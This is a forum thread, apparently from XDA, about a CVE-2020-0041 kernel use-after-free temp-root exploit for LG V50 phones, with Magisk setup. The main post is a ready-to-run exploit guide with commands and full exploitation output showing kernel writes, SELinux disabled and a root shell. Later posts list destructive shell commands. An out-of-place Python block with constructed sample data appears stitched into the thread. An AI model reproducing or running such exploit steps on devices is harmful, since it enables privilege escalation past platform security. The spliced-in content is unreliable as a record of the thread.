
[LG V50] temp root exploit via CVE-2020-0041 including magisk setup



Senior Member
Sep 11, 2019
LG V40
Can I do the sprint g8 volte and wifi calling fix for TMobile, using this method on a v50? I know I'll have to change some things. But my worry is changing build.prop and 2 other files with a locked bootloader?

Also if we can get a sprint v50 unlocked bootloader and then see if we can get the TMobile 5g fix. Since TMobile killed 5g for the phone since it didn't work with TMobile 5ge or fake 5g on n71
You'll have to unlock the bootloader for any volte fix. Join the telegram group please


Nov 2, 2014
I keep hearing about telegram and yet I don't have any idea how to join or find it. I know I'm old I guess.

Also I hope the kdz handling changes with TMobile owning sprint now and if they convert the v50 sprint model I won't need to root or volte fix. But it may be worth it since the 5g scam from TMobile killing 5g on devices because of tower bugs in Nokia equipment. The s20 had the same patch that needed to be applied to make it work again


Senior Member
Sep 11, 2019
LG V40
That very likely won't change unfortunately as there are differences in hardware, and they can't do anything remotely to switch hardware locks. I mean maybe they will somehow push an update or make a kdz for the Sprint model, but again, they probably don't care and won't do it.
For the telegram group just search "lg v50" in telegram; apparently it's against the rules to post links for that here


Nov 2, 2014
They already converted sprint S10 and s20 to TMobile. And with the 1 million customers moved to TMobile from sprint, and putting more strain on old 2g and 3g equipment, it has caused 11 days of up and down outages. Heck, the Monday they moved all those customers over caused a huge outage that the FCC is now investigating.

LG reasons for upgrading LG v50
1. Cold boot exploit.
2. Ransomware
3. LG v50 Android 11 eventually.

TMobile reason to update
1. Risking LG partnerships on budget phone market.
2. More strain on old equipment
3. CEO promising 1st Gen 5g phones compatibility
(S10 already converted)
Not converting many phones to TMobile can also cost them customers, especially ones that paid for a flagship. Customers like myself were less willing to purchase a new device from T-Mobile or sprint because it wasn't worth the contracts and they actually didn't offer it free for the upgrade, they still wanted money for the s20 replacement. Which was very unfortunate. But this caused many sprint customers to not upgrade the LG v50. The issue is when roaming on TMobile from sprint the volte also doesn't work, so it's a matter of time that TMobile will have more issues with the next wave of devices being put on TMobile towers if they don't provision volte on the network


Senior Member
Feb 11, 2012
Is the LM-V450PM rootable with this exploit? My S8+'s screen cracked again, it's time to get a new phone.



Senior Member
Jun 27, 2015
Is it possible to use this root exploit on another phone like the V30? I'm trying to root the H932 model without the ridiculous FWUL and LAF method. It's already bootloader unlocked, I just need to flash the TWRP recovery image, but LG is known for bricking download mode on T-Mobile phones which won't allow you to boot or flash any images. It has the August 2019 LG Security patch and is running Pie with the 4.4.153 kernel.


Feb 28, 2019
Just flashed "LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0", as it was the freshest one. The first time I tried a binary from OP it seemed to hang up on step
> Reallocating content of 'write8_inode' with controlled data.................
Then I stopped it with Ctrl+C, took it out of the dual screen case and then it worked as intended. The problem is, when I close the root cli to push some additional files, I run this binary again and now it reboots the phone for some reason. The phone seems to work fine, but every time the binary passes "write8_inode" it reboots the phone. Is there something I might irreversibly screw so I need to reflash, or is there a simpler way to get back to root cli?
UPD: seemed to work on 5th, I think, attempt. Seems that I didn't brick the needed component and now even magisk works. I guess I'll leave it there for someone, it's magisk-setup first, then binary, then magisk-start, everything else caused reboot.


Senior Member
Jan 18, 2013
Is there a way to root or downgrade and then root my sprint lg v50 running v450p20f?
I can switch to a different slot and it will show 450p20e

    temp root exploit for LG V50 ThinQ with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.14 that is used with LG phones running Android 10 with March security patch level.
    This work has been done upon request of @Inerent who contributed not only with very fine donations, but also did all the testing on his LG phone, as I do not own any LG phone myself.

    As an addon I have implemented setup of magisk v20.4 from the temp root exploit, including su permission asking notification support, which has also been a hell of work to get working.

    You can find currently running fw version with 'getprop ro.vendor.lge.factoryversion' command run in an adb shell.
    • LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0 - LG V50 ThinQ with V500N20m fw, 2020-03-01 security patch level
    • LMV500NAT-00-V20f-LAO-COM-JAN-31-2020+0 - LG V50 ThinQ with V500N20f fw, 2020-01-01 security patch level
    • LMV500NAT-00-V20b-LAO-COM-DEC-23-2019+0 - LG V50 ThinQ with V500N20b fw, 2019-12-01 security patch level
    • LMV500AT-00-V20g-LAO-COM-MAR-10-2020+0
    • LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0
    • LMV500AT-00-V20e-LAO-COM-JAN-23-2020+0
    • LMV450AT-00-V20a-LAO-COM-JAN-15-2020-ARB00+2 - LG V50 ThinQ Sprint fw, 2020-01-01 security patch level
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the v50g8-mroot3.zip with the exploit attached in this post and unzip it
    • use 'adb push v50g8-mroot3 /data/local/tmp' and get temp root with following commands in 'adb shell':
      cd /data/local/tmp
      chmod 755 ./v50g8-mroot3
      ./v50g8-mroot3

    If it worked, you should see something like this:
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root) context=kernel
    root_by_cve-2020-0041:/data/local/tmp #

    In case you get 'target is not supported', you may list supported targets with
    ./v50g8-mroot3 -T
    and try to force one close to yours using '-t num' option.

    Please see the 2nd post for magisk setup from temp root details.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or the kernel boot partition, can result in a phone that no longer boots.
    In such a case you would need a way to emergency flash stock firmware to recover.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow making permanent changes in crucial partitions until bootloader unlock is achieved.
    Some partitions might still be possible to modify - for example in case of Sony Xperia phones it was possible to do permanent debloat via changes in the /oem partition and such debloat would survive even a factory reset. Similarly some modem configs have been present in /oem allowing to set up IMS for different operators/regions or tune other modem related stuff.

    Exploit sources for all releases are available at my github here.

    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    If you like my work, you can donate using the Donate to Me button with several methods there.

    Already donated:
    Thank you very much to all who donated or are about to donate.

    To enjoy the temporal root with apps asking for root permission, you can now start magisk v20.4 from the root shell provided by the exploit.
    • download the v50g8-mroot3.zip with the exploit attached in the first post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push v50g8-mroot3.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      cd /data/local/tmp
      unzip v50g8-mroot3.zip
      chmod 755 v50g8-mroot3 magisk-setup.sh magisk-start.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      cd /data/local/tmp
      ./v50g8-mroot3
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3
      just this point should be done after each reboot to get magisk running again.
      NOTE: please be sure to enter each command separately, line after line - do not paste all in a single block and do not put them in a script.
      There are reasons this is divided in 3 stages. With this approach I got the best stability, while putting ./v50g8-mroot3 together with -1 and/or -2 stuff in a single script run resulted in a reboot most of the time.
      Phases 2 and 3 need to be split for functional reasons to start magisk with working su permission asking notification.

    If it worked, you should see something like this:

    flashlmdd:/ $ cd /data/local/tmp
    flashlmdd:/data/local/tmp $ ./v50g8-mroot3
    [+] factoryversion = LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
    + FRESH=false 
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
    + FRESH=false 
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2 
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config 
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config 
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148 
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate 
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
    + FRESH=false 
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3 
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd 
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC='' 
    + timeout=10 
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10 
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165 
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10 
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9 
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.14.117-perf #1 SMP PREEMPT Tue Mar 10 18:44:38 KST 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    You can even re-enable selinux like this from 'adb shell':
    su -c 'setenforce 1'
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    The exploit is based on a use-after-free, which means it depends on the state of the memory heap and how it changes during the exploit.
    That means there is some portion of unpredictability and a chance that something else is overwritten than hoped for by shaping the heap.
    So to get best results, one should stop anything that could run in background, like:
    • set airplane mode, turn off wifi and bluetooth so there is no data connection at all
    • set "Stay awake" to ON while charging (i.e. using adb shell) in developer options
    • disable auto updates of system and apps
    • debloat your system so useless apps do not run in background
    • reboot your phone having all the above
    • wait two minutes after boot up with phone unlocked, screen on, connected to PC via usb cable having 'adb shell' already active (checking with 'uptime' command)
    • start the exploit
    • after getting root shell and successfully starting magisk, do not forget to properly exit the temp root shell by use of 'exit' command two times, so the 'adb shell' with the exploit is ended with the rest of clean up

    • 2020-05-11 : Initial release (V500N20m-testJ) supporting V500N20m all Korean variants
    • 2020-05-16 : multiple targets supported (v50g8-root)
    • 2020-05-20 : v50g8-dump tool to dump kernel space memory available in G8 thread
    • 2020-05-24 : implemented support for magisk start from the exploit (v50g8-mroot), added support for V50 Sprint with 2020-01-01 security patch level
    • 2020-06-10 : fixed problem when V50 rebooted/crashed soon after obtaining temp root shell, released as v50g8-mroot2
    • 2020-06-23 : hopefully stability improved even more with V50 allowing stable magisk start from temp root, released as v50g8-mroot3
    Received 150 USD to my paypal from Kevin Borges with following comment:
    KanBorges said:
    Thank you so much for your work. This is all the money in the bounty I set up on Gofundme.com. My username in XDA is @KanBorges . Again, thank you! Hopefully you can get twrp/magisk soon.
    Thank you and all other contributors for the donations.
    I've updated the first post (not only the donations list but added some more clarifications too).

    Please note, as discussed since the beginning with @Inerent, only the temp root exploit was supposed to be implemented by me.
    There is however an engineering bootloader available, that may eventually allow unlocking the bootloader after flashing it from temp root.
    This needs to be tested first and can involve some risk of bricking the phone.
    I do not own any LG phone (and do not even want one), so I am not doing that, sorry.

    But I've already checked a few things regarding the engineering bootloader and I can conclude that it could be compatible in the sense that it most likely would not brick the device.
    The reason I see that: comparing the stock firmware ABL image and the eng bootloader (aka ABL), it seems that both use the same signing root certificate and they both have identical OU info in the signature certificate:
            OU=07 0001 SHA256,
            OU=06 0000 MODEL_ID,
            OU=05 00000000 SW_SIZE,
            OU=04 0031 OEM_ID,
            OU=03 0000000000000001 DEBUG,
            OU=02 000A50E100310000 HW_ID,
            OU=01 000000000000001C SW_ID
    Whether it would work with Android 10 is another question though.
    Please find attached the source for a split utility, to extract the parts of the image likely to start with a signature certificate.
    Those parts can then be converted to a text representation of the certificate with the following command, for example:
    openssl x509 -in LUN4_abl_a_COM3.img-001238 -inform der -text -noout > LUN4_abl_a_COM3.img-001238.txt
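As an added example (not the split utility or any other code from this post), here is how the comparison described above could be automated: scan an ABL image for DER certificate starts, pull the numbered OU fields out of the 'openssl x509 -text' dump, and compare issuer and OU values between the stock and engineering ABL before deciding anything about flashing. The issuer and subject names and the 0042 OEM_ID in the mismatch sample are constructed; the OU values are the ones quoted above, and the DER scan heuristic is an assumption about how such a split tool works.

```python
import re
from typing import Dict, List, Tuple

# Numbered OU attributes as they appear in the post's certificate dump
# (index -> label), used to sanity-check what the regex picked up.
OU_FIELDS = {"01": "SW_ID", "02": "HW_ID", "03": "DEBUG", "04": "OEM_ID",
             "05": "SW_SIZE", "06": "MODEL_ID", "07": "SHA256"}

def find_der_certificates(blob: bytes) -> List[int]:
    """Heuristic offsets of DER X.509v3 certificates in a raw image, matching
    SEQUENCE(len16) { SEQUENCE(len16) { [0] EXPLICIT { INTEGER 2 } ... }.
    Assumed logic for a split tool, not the post's own utility."""
    offsets = []
    i = blob.find(b"\x30\x82")
    while i != -1:
        outer = int.from_bytes(blob[i + 2:i + 4], "big")   # whole certificate length
        inner = int.from_bytes(blob[i + 6:i + 8], "big")   # tbsCertificate length
        if (blob[i + 4:i + 6] == b"\x30\x82" and blob[i + 8:i + 13] == b"\xa0\x03\x02\x01\x02"
                and inner < outer and i + 4 + outer <= len(blob)):
            offsets.append(i)
        i = blob.find(b"\x30\x82", i + 1)
    return offsets

def parse_ou_fields(openssl_text: str) -> Dict[str, str]:
    """Map LABEL -> hex value for every 'OU=<idx> <value> <LABEL>' entry in
    'openssl x509 -text' output (accepts both 'OU=' and 'OU = ' spellings)."""
    fields = {}
    for idx, value, label in re.findall(
            r"OU\s*=\s*(\d{2})\s+([0-9A-Fa-f]+)\s+([A-Z][A-Z0-9_]*)", openssl_text):
        if OU_FIELDS.get(idx, label) != label:
            raise ValueError(f"OU index {idx} carries unexpected label {label}")
        fields[label] = value.upper()
    return fields

def parse_issuer(openssl_text: str) -> str:
    m = re.search(r"^\s*Issuer:\s*(.+?)\s*$", openssl_text, re.M)
    return m.group(1) if m else ""

def check_abl_compat(stock_text: str, candidate_text: str) -> Tuple[bool, List[str]]:
    """Same issuer and identical OU values is the condition the post relies on;
    any reported difference is a reason not to flash the candidate ABL."""
    diffs = []
    if parse_issuer(stock_text) != parse_issuer(candidate_text):
        diffs.append("issuer differs")
    a, b = parse_ou_fields(stock_text), parse_ou_fields(candidate_text)
    for label in sorted(set(a) | set(b)):
        if a.get(label) != b.get(label):
            diffs.append(f"{label}: {a.get(label)} != {b.get(label)}")
    return (not diffs, diffs)

# Constructed sample dumps: issuer/subject names are made up, the OU values are
# those quoted in the post; FOREIGN gets a made-up OEM_ID to show a mismatch.
_SUBJECT_OUS = """            OU=07 0001 SHA256,
            OU=06 0000 MODEL_ID,
            OU=05 00000000 SW_SIZE,
            OU=04 0031 OEM_ID,
            OU=03 0000000000000001 DEBUG,
            OU=02 000A50E100310000 HW_ID,
            OU=01 000000000000001C SW_ID
"""
_HEAD = "Certificate:\n    Data:\n        Issuer: O=Example OEM (constructed), CN=Attestation CA\n"
STOCK_ABL_TEXT = _HEAD + "        Subject: O=Example OEM (constructed),\n" + _SUBJECT_OUS
ENG_ABL_TEXT = STOCK_ABL_TEXT  # identical OU info, as the post reports
FOREIGN_ABL_TEXT = STOCK_ABL_TEXT.replace("OU=04 0031 OEM_ID", "OU=04 0042 OEM_ID")

# Constructed image: a decoy "30 82" that is no certificate, 12 filler bytes, then a
# fake v3 certificate header (outer length 0x310) followed by exactly that many bytes.
SAMPLE_IMAGE = (b"\x30\x82\x00\x04" + b"\x00" * 12
                + b"\x30\x82\x03\x10\x30\x82\x02\x20\xa0\x03\x02\x01\x02" + b"\xff" * (0x310 - 9))
```

Feed the real 'openssl x509 -text' dumps of both ABL images to check_abl_compat; any difference in issuer or OU fields means the signing identity does not match the stock image.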
    Ok guys, OK!!!!
    Here is a guide made for noobs for Root (download, extract and copy root file inside platform tools folder) and Backup in it, using Adb Platform Tools

    Root and Backup V50 Korea

    1. Download LG V50 Root (extract it and copy inside platform tools folder), Platform Tools ADB and LG USB Drivers 4.4.2 and install it

    2. Connect USB then Enable Developer Options and USB Debugging and enable Stay Awake Screen

    3. Turn off wifi, data, bluetooth restart phone, unlock screen and let it 1 minute to load all processes

    4. Run Power shell command from inside platform tools folder (SHIFT+right mouse and open power shell here) and type cmd and hit enter

    5. Run command - adb devices - a popup should appear on your phone - tap Allow and Remember it on your phone!

    6. Run one by one the following commands

    adb push V500N20m-testJ /data/local/tmp
    adb shell
    cd /data/local/tmp
    chmod 755 ./V500N20m-testJ
    ./V500N20m-testJ

    7. When rooted you will have these lines in terminal
    [*] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp #

    If root is not achieved or phone restarts by itself repeat from step 3

    Backup Important non KDZ Stuff like IMEI

    1. Download this file backupselected.sh and move it inside your adb program folder. This is already pushed to the Platform Tools folder, so ignore it

    2. Run this command from cmd
    adb push backupselected.sh /data/local/tmp

    3. Obtain Temp Root and from root shell run these
    chmod -R 777 /data/local/tmp

    4. Backup will be saved in Download folder on your phone

    Useful Commands - Maybe @j4nn can help us with more useful commands
    rm *.* - delete all files
    rm -rf (folder name) - delete that folder
    adb push (folder or file name) /data/local/tmp - copy that folder or file name to that /data/local/tmp address
    cd /data/local/tmp - then - pm install (appname) - installs it
    @quantan, most likely not, due to dm-verity/AVB 2.0 - it is a temp root...
    Magisk (with possibly limited functionality) may be eventually started from the exploit, but it seems not to work yet...